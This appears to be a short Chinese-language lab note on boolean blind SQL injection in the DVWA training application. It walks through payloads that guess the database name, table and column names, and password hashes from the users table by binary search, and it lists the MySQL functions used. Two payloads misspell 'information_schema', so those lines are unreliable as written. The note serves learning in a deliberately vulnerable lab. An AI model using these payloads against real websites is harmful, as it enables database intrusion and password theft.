在DVWA的SQL盲注模块中:
判断当前数据库长度为4。
id=1' and length(database())>3 -- 执行成功
id=1' and length(database())>4 -- 执行失败
采用二分法逐步猜解数据库名为dvwa。
id=1' and ascii(mid(database(),1,1))>99 -- 执行成功
id=1' and ascii(mid(database(),1,1))>100 -- 执行失败
采用二分法逐步猜解表名。
id=1' and ascii(mid((select table_name from information_schem.tables where table_schema='dvwa' limit 0,1),1,1))>x -- 执行失败/成功
采用二分法逐步猜解字段名。
id=1' and ascii(mid((select column_name from information_schem.columns where table_schema='dvwa' and table_name='users' limit 0,1),1,1))>x -- 执行失败/成功
采用二分法逐步猜解内容。
id=1' and ascii(mid((select password from dvwa.users limit 0,1),1,1))>x -- 执行失败/成功
mysql盲注关键函数:
count()
limit()
length()
mid()
substring()
substr()
left()
ascii()
if()